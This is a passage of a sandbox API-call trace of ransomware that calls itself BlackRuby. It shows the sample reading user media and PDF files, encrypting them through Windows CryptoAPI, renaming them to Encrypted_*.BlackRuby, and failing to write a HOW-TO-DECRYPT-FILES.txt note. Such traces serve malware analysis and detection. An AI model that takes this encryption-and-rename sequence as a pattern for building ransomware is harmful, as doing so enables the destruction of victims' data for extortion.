CloseHandle (hObject=0x184) returned 1 [0051.452] GetLastError () returned 0x0 [0051.452] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\sx84lhCLFqe0UE87_.mp3", nBufferLength=0x105, lpBuffer=0x18e8cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\sx84lhCLFqe0UE87_.mp3", lpFilePart=0x0) returned 0x36 [0051.452] GetLastError () returned 0x0 [0051.452] SetErrorMode (uMode=0x1) returned 0x0 [0051.452] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\sx84lhCLFqe0UE87_.mp3" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\sx84lhclfqe0ue87_.mp3"), fInfoLevelId=0x0, lpFileInformation=0x18ed80 | out: lpFileInformation=0x18ed80*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5e0030b0, ftCreationTime.dwHighDateTime=0x1d34a56, ftLastAccessTime.dwLowDateTime=0xc54ead90, ftLastAccessTime.dwHighDateTime=0x1d34b24, ftLastWriteTime.dwLowDateTime=0xc54ead90, ftLastWriteTime.dwHighDateTime=0x1d34b24, nFileSizeHigh=0x0, nFileSizeLow=0x18084)) returned 1 [0051.452] GetLastError () returned 0x0 [0051.452] SetErrorMode (uMode=0x0) returned 0x1 [0051.452] CryptAcquireContextW (in: phProv=0x18ece0, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ece0*=0x37c4e8) returned 1 [0051.452] GetLastError () returned 0x0 [0051.485] CryptImportKey (in: hProv=0x37c4e8, pbData=0x1ca55a4, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ecbc | out: phKey=0x18ecbc*=0x360da0) returned 1 [0051.485] GetLastError () returned 0x0 [0051.485] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0051.486] GetLastError () returned 0x0 [0051.490] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0051.490] GetLastError () returned 0x0 [0051.490] CryptDuplicateKey (in: hKey=0x360da0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec78 | out: phKey=0x18ec78*=0x360ea0) returned 1 [0051.491] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0051.491] GetLastError () returned 0x0 [0051.491] CryptSetKeyParam (hKey=0x360ea0, dwParam=0x4, pbData=0x1cd25f0*=0x1, dwFlags=0x0) returned 1 [0051.491] GetLastError () returned 0x0 [0051.491] CryptSetKeyParam (hKey=0x360ea0, dwParam=0x1, pbData=0x1cd25bc, dwFlags=0x0) returned 1 [0051.491] GetLastError () returned 0x0 [0051.491] CryptEncrypt (in: hKey=0x360ea0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c18a70*, pdwDataLen=0x18ed08*=0x18180, dwBufLen=0x18180 | out: pbData=0x2c18a70*, pdwDataLen=0x18ed08*=0x18180) returned 1 [0051.492] GetLastError () returned 0x0 [0051.493] CryptEncrypt (in: hKey=0x360ea0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cd264c*, pdwDataLen=0x18ed20*=0x10, dwBufLen=0x10 | out: pbData=0x1cd264c*, pdwDataLen=0x18ed20*=0x10) returned 1 [0051.493] GetLastError () returned 0x0 [0051.493] CryptEncrypt (in: hKey=0x360ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1cd267c*, pdwDataLen=0x18ed28*=0x0, dwBufLen=0x10 | out: pbData=0x1cd267c*, pdwDataLen=0x18ed28*=0x10) returned 1 [0051.493] GetLastError () returned 0x0 [0051.496] CryptDestroyKey (hKey=0x360da0) returned 1 [0051.496] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0051.496] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0051.496] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\sx84lhCLFqe0UE87_.mp3", nBufferLength=0x105, lpBuffer=0x18e7c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\sx84lhCLFqe0UE87_.mp3", lpFilePart=0x0) returned 0x36 [0051.496] GetLastError () returned 0x0 [0051.496] SetErrorMode (uMode=0x1) returned 0x0 [0051.496] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\sx84lhCLFqe0UE87_.mp3" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\sx84lhclfqe0ue87_.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0051.497] GetLastError () returned 0xb7 [0051.497] GetFileType (hFile=0x184) returned 0x1 [0051.497] SetErrorMode (uMode=0x0) returned 0x1 [0051.497] GetFileType (hFile=0x184) returned 0x1 [0051.500] CloseHandle (hObject=0x184) returned 1 [0051.500] GetLastError () returned 0xb7 [0051.500] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\sx84lhCLFqe0UE87_.mp3", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\sx84lhCLFqe0UE87_.mp3", lpFilePart=0x0) returned 0x36 [0051.500] GetLastError () returned 0xb7 [0051.500] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_PpiMr3BfBB6TSwCfsp0fbmn2Kl4AqcV3gNBdDh3P.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_PpiMr3BfBB6TSwCfsp0fbmn2Kl4AqcV3gNBdDh3P.BlackRuby", lpFilePart=0x0) returned 0x5d [0051.500] GetLastError () returned 0xb7 [0051.500] SetErrorMode (uMode=0x1) returned 0x0 [0051.500] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\sx84lhCLFqe0UE87_.mp3" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\sx84lhclfqe0ue87_.mp3"), fInfoLevelId=0x0, lpFileInformation=0x18ed68 | out: lpFileInformation=0x18ed68*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5e0030b0, ftCreationTime.dwHighDateTime=0x1d34a56, ftLastAccessTime.dwLowDateTime=0xc54ead90, ftLastAccessTime.dwHighDateTime=0x1d34b24, ftLastWriteTime.dwLowDateTime=0x26e72da0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x18190)) returned 1 [0051.500] GetLastError () returned 0xb7 [0051.500] SetErrorMode (uMode=0x0) returned 0x1 [0051.500] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\sx84lhCLFqe0UE87_.mp3" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\sx84lhclfqe0ue87_.mp3"), lpNewFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_PpiMr3BfBB6TSwCfsp0fbmn2Kl4AqcV3gNBdDh3P.BlackRuby" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\encrypted_ppimr3bfbb6tswcfsp0fbmn2kl4aqcv3gnbddh3p.blackruby")) returned 1 [0051.501] GetLastError () returned 0xb7 [0051.502] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x39 [0051.502] GetLastError () returned 0xb7 [0051.502] SetErrorMode (uMode=0x1) returned 0x0 [0051.502] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0051.502] GetLastError () returned 0x5 [0051.502] SetErrorMode (uMode=0x0) returned 0x1 [0051.503] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Tl95n.m4a", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Tl95n.m4a", lpFilePart=0x0) returned 0x2a [0051.503] GetLastError () returned 0x5 [0051.503] SetErrorMode (uMode=0x1) returned 0x0 [0051.503] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Tl95n.m4a" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\tl95n.m4a"), fInfoLevelId=0x0, lpFileInformation=0x1cef978 | out: lpFileInformation=0x1cef978*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8274a120, ftCreationTime.dwHighDateTime=0x1d34bbd, ftLastAccessTime.dwLowDateTime=0x565d24b0, ftLastAccessTime.dwHighDateTime=0x1d355b6, ftLastWriteTime.dwLowDateTime=0x565d24b0, ftLastWriteTime.dwHighDateTime=0x1d355b6, nFileSizeHigh=0x0, nFileSizeLow=0xdc72)) returned 1 [0051.503] GetLastError () returned 0x5 [0051.503] SetErrorMode (uMode=0x0) returned 0x1 [0051.503] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x39 [0051.503] GetLastError () returned 0x5 [0051.503] SetErrorMode (uMode=0x1) returned 0x0 [0051.503] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0051.503] GetLastError () returned 0x5 [0051.504] SetErrorMode (uMode=0x0) returned 0x1 [0051.504] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\TrnVlUN2vg6b.gif", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\TrnVlUN2vg6b.gif", lpFilePart=0x0) returned 0x31 [0051.504] GetLastError () returned 0x5 [0051.504] SetErrorMode (uMode=0x1) returned 0x0 [0051.504] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\TrnVlUN2vg6b.gif" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\trnvlun2vg6b.gif"), fInfoLevelId=0x0, lpFileInformation=0x1d0d898 | out: lpFileInformation=0x1d0d898*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7408d550, ftCreationTime.dwHighDateTime=0x1d359f2, ftLastAccessTime.dwLowDateTime=0x5ced4bf0, ftLastAccessTime.dwHighDateTime=0x1d3526b, ftLastWriteTime.dwLowDateTime=0x5ced4bf0, ftLastWriteTime.dwHighDateTime=0x1d3526b, nFileSizeHigh=0x0, nFileSizeLow=0x46fd)) returned 1 [0051.504] GetLastError () returned 0x5 [0051.504] SetErrorMode (uMode=0x0) returned 0x1 [0051.505] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\TrnVlUN2vg6b.gif", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\TrnVlUN2vg6b.gif", lpFilePart=0x0) returned 0x31 [0051.505] GetLastError () returned 0x5 [0051.505] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\TrnVlUN2vg6b.gif", nBufferLength=0x105, lpBuffer=0x18e7bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\TrnVlUN2vg6b.gif", lpFilePart=0x0) returned 0x31 [0051.505] GetLastError () returned 0x5 [0051.505] SetErrorMode (uMode=0x1) returned 0x0 [0051.505] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\TrnVlUN2vg6b.gif" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\trnvlun2vg6b.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0051.505] GetLastError () returned 0x0 [0051.505] GetFileType (hFile=0x184) returned 0x1 [0051.505] SetErrorMode (uMode=0x0) returned 0x1 [0051.505] GetFileType (hFile=0x184) returned 0x1 [0051.505] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ed70 | out: lpFileSizeHigh=0x18ed70*=0x0) returned 0x46fd [0051.505] GetLastError () returned 0x0 [0051.505] ReadFile (in: hFile=0x184, lpBuffer=0x1d0f7a4, nNumberOfBytesToRead=0x46fd, lpNumberOfBytesRead=0x18ed18, lpOverlapped=0x0 | out: lpBuffer=0x1d0f7a4*, lpNumberOfBytesRead=0x18ed18*=0x46fd, lpOverlapped=0x0) returned 1 [0051.506] GetLastError () returned 0x0 [0051.506] CloseHandle (hObject=0x184) returned 1 [0051.506] GetLastError () returned 0x0 [0051.506] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\TrnVlUN2vg6b.gif", nBufferLength=0x105, lpBuffer=0x18e8cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\TrnVlUN2vg6b.gif", lpFilePart=0x0) returned 0x31 [0051.506] GetLastError () returned 0x0 [0051.506] SetErrorMode (uMode=0x1) returned 0x0 [0051.506] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\TrnVlUN2vg6b.gif" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\trnvlun2vg6b.gif"), fInfoLevelId=0x0, lpFileInformation=0x18ed80 | out: lpFileInformation=0x18ed80*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7408d550, ftCreationTime.dwHighDateTime=0x1d359f2, ftLastAccessTime.dwLowDateTime=0x5ced4bf0, ftLastAccessTime.dwHighDateTime=0x1d3526b, ftLastWriteTime.dwLowDateTime=0x5ced4bf0, ftLastWriteTime.dwHighDateTime=0x1d3526b, nFileSizeHigh=0x0, nFileSizeLow=0x46fd)) returned 1 [0051.506] GetLastError () returned 0x0 [0051.506] SetErrorMode (uMode=0x0) returned 0x1 [0051.544] CryptImportKey (in: hProv=0x37c818, pbData=0x1b77cb4, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ecbc | out: phKey=0x18ecbc*=0x360fa0) returned 1 [0051.544] GetLastError () returned 0x0 [0051.544] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0051.544] GetLastError () returned 0x0 [0051.549] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0051.549] GetLastError () returned 0x0 [0051.549] CryptDuplicateKey (in: hKey=0x360fa0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec78 | out: phKey=0x18ec78*=0x3609e0) returned 1 [0051.549] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0051.549] GetLastError () returned 0x0 [0051.549] CryptSetKeyParam (hKey=0x3609e0, dwParam=0x4, pbData=0x1ba4d00*=0x1, dwFlags=0x0) returned 1 [0051.549] GetLastError () returned 0x0 [0051.549] CryptSetKeyParam (hKey=0x3609e0, dwParam=0x1, pbData=0x1ba4ccc, dwFlags=0x0) returned 1 [0051.549] GetLastError () returned 0x0 [0051.549] CryptEncrypt (in: hKey=0x3609e0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1ba4d48*, pdwDataLen=0x18ed08*=0x47f0, dwBufLen=0x47f0 | out: pbData=0x1ba4d48*, pdwDataLen=0x18ed08*=0x47f0) returned 1 [0051.549] GetLastError () returned 0x0 [0051.549] CryptEncrypt (in: hKey=0x3609e0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1badd54*, pdwDataLen=0x18ed20*=0x10, dwBufLen=0x10 | out: pbData=0x1badd54*, pdwDataLen=0x18ed20*=0x10) returned 1 [0051.549] GetLastError () returned 0x0 [0051.549] CryptEncrypt (in: hKey=0x3609e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1badd84*, pdwDataLen=0x18ed28*=0x0, dwBufLen=0x10 | out: pbData=0x1badd84*, pdwDataLen=0x18ed28*=0x10) returned 1 [0051.549] GetLastError () returned 0x0 [0051.549] CryptDestroyKey (hKey=0x360fa0) returned 1 [0051.549] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0051.549] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0051.550] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\TrnVlUN2vg6b.gif", nBufferLength=0x105, lpBuffer=0x18e7c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\TrnVlUN2vg6b.gif", lpFilePart=0x0) returned 0x31 [0051.550] GetLastError () returned 0x0 [0051.550] SetErrorMode (uMode=0x1) returned 0x0 [0051.550] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\TrnVlUN2vg6b.gif" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\trnvlun2vg6b.gif"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0051.550] GetLastError () returned 0xb7 [0051.550] GetFileType (hFile=0x184) returned 0x1 [0051.551] SetErrorMode (uMode=0x0) returned 0x1 [0051.551] GetFileType (hFile=0x184) returned 0x1 [0051.552] CloseHandle (hObject=0x184) returned 1 [0051.552] GetLastError () returned 0xb7 [0051.552] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\TrnVlUN2vg6b.gif", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\TrnVlUN2vg6b.gif", lpFilePart=0x0) returned 0x31 [0051.552] GetLastError () returned 0xb7 [0051.552] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_b0xL3oIL3rU7iLujJVAuoGS7C5TImVpyE2szTJF1miiZX.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_b0xL3oIL3rU7iLujJVAuoGS7C5TImVpyE2szTJF1miiZX.BlackRuby", lpFilePart=0x0) returned 0x62 [0051.552] GetLastError () returned 0xb7 [0051.552] SetErrorMode (uMode=0x1) returned 0x0 [0051.553] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\TrnVlUN2vg6b.gif" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\trnvlun2vg6b.gif"), fInfoLevelId=0x0, lpFileInformation=0x18ed68 | out: lpFileInformation=0x18ed68*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7408d550, ftCreationTime.dwHighDateTime=0x1d359f2, ftLastAccessTime.dwLowDateTime=0x5ced4bf0, ftLastAccessTime.dwHighDateTime=0x1d3526b, ftLastWriteTime.dwLowDateTime=0x26ee51c0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x4800)) returned 1 [0051.553] GetLastError () returned 0xb7 [0051.553] SetErrorMode (uMode=0x0) returned 0x1 [0051.553] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\TrnVlUN2vg6b.gif" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\trnvlun2vg6b.gif"), lpNewFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_b0xL3oIL3rU7iLujJVAuoGS7C5TImVpyE2szTJF1miiZX.BlackRuby" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\encrypted_b0xl3oil3ru7ilujjvauogs7c5timvpye2sztjf1miizx.blackruby")) returned 1 [0051.553] GetLastError () returned 0xb7 [0051.553] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x39 [0051.553] GetLastError () returned 0xb7 [0051.553] SetErrorMode (uMode=0x1) returned 0x0 [0051.553] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0051.554] GetLastError () returned 0x5 [0051.554] SetErrorMode (uMode=0x0) returned 0x1 [0051.554] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\uHCXLvGPjP9IY_.m4a", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\uHCXLvGPjP9IY_.m4a", lpFilePart=0x0) returned 0x33 [0051.554] GetLastError () returned 0x5 [0051.555] SetErrorMode (uMode=0x1) returned 0x0 [0051.555] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\uHCXLvGPjP9IY_.m4a" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\uhcxlvgpjp9iy_.m4a"), fInfoLevelId=0x0, lpFileInformation=0x1bd8864 | out: lpFileInformation=0x1bd8864*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x10c444c0, ftCreationTime.dwHighDateTime=0x1d34f5c, ftLastAccessTime.dwLowDateTime=0xfa194ae0, ftLastAccessTime.dwHighDateTime=0x1d35000, ftLastWriteTime.dwLowDateTime=0xfa194ae0, ftLastWriteTime.dwHighDateTime=0x1d35000, nFileSizeHigh=0x0, nFileSizeLow=0x10d17)) returned 1 [0051.555] GetLastError () returned 0x5 [0051.555] SetErrorMode (uMode=0x0) returned 0x1 [0051.555] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x39 [0051.555] GetLastError () returned 0x5 [0051.555] SetErrorMode (uMode=0x1) returned 0x0 [0051.555] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0051.555] GetLastError () returned 0x5 [0051.556] SetErrorMode (uMode=0x0) returned 0x1 [0051.556] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\utPJ.m4a", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\utPJ.m4a", lpFilePart=0x0) returned 0x29 [0051.556] GetLastError () returned 0x5 [0051.556] SetErrorMode (uMode=0x1) returned 0x0 [0051.556] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\utPJ.m4a" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\utpj.m4a"), fInfoLevelId=0x0, lpFileInformation=0x1bf64c8 | out: lpFileInformation=0x1bf64c8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x73612820, ftCreationTime.dwHighDateTime=0x1d35617, ftLastAccessTime.dwLowDateTime=0x601a56b0, ftLastAccessTime.dwHighDateTime=0x1d35752, ftLastWriteTime.dwLowDateTime=0x601a56b0, ftLastWriteTime.dwHighDateTime=0x1d35752, nFileSizeHigh=0x0, nFileSizeLow=0xf9c5)) returned 1 [0051.556] GetLastError () returned 0x5 [0051.556] SetErrorMode (uMode=0x0) returned 0x1 [0051.557] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x39 [0051.557] GetLastError () returned 0x5 [0051.557] SetErrorMode (uMode=0x1) returned 0x0 [0051.557] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0051.557] GetLastError () returned 0x5 [0051.558] SetErrorMode (uMode=0x0) returned 0x1 [0051.558] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vgUKnoLH7LDm QcJx.pdf", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vgUKnoLH7LDm QcJx.pdf", lpFilePart=0x0) returned 0x36 [0051.558] GetLastError () returned 0x5 [0051.558] SetErrorMode (uMode=0x1) returned 0x0 [0051.558] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vgUKnoLH7LDm QcJx.pdf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vguknolh7ldm qcjx.pdf"), fInfoLevelId=0x0, lpFileInformation=0x1c140f0 | out: lpFileInformation=0x1c140f0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe8283d30, ftCreationTime.dwHighDateTime=0x1d354a3, ftLastAccessTime.dwLowDateTime=0x152809e0, ftLastAccessTime.dwHighDateTime=0x1d35969, ftLastWriteTime.dwLowDateTime=0x152809e0, ftLastWriteTime.dwHighDateTime=0x1d35969, nFileSizeHigh=0x0, nFileSizeLow=0x18f1a)) returned 1 [0051.558] GetLastError () returned 0x5 [0051.558] SetErrorMode (uMode=0x0) returned 0x1 [0051.558] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vgUKnoLH7LDm QcJx.pdf", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vgUKnoLH7LDm QcJx.pdf", lpFilePart=0x0) returned 0x36 [0051.558] GetLastError () returned 0x5 [0051.558] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vgUKnoLH7LDm QcJx.pdf", nBufferLength=0x105, lpBuffer=0x18e7bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vgUKnoLH7LDm QcJx.pdf", lpFilePart=0x0) returned 0x36 [0051.558] GetLastError () returned 0x5 [0051.558] SetErrorMode (uMode=0x1) returned 0x0 [0051.558] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vgUKnoLH7LDm QcJx.pdf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vguknolh7ldm qcjx.pdf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0051.558] GetLastError () returned 0x0 [0051.558] GetFileType (hFile=0x184) returned 0x1 [0051.559] SetErrorMode (uMode=0x0) returned 0x1 [0051.559] GetFileType (hFile=0x184) returned 0x1 [0051.559] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ed70 | out: 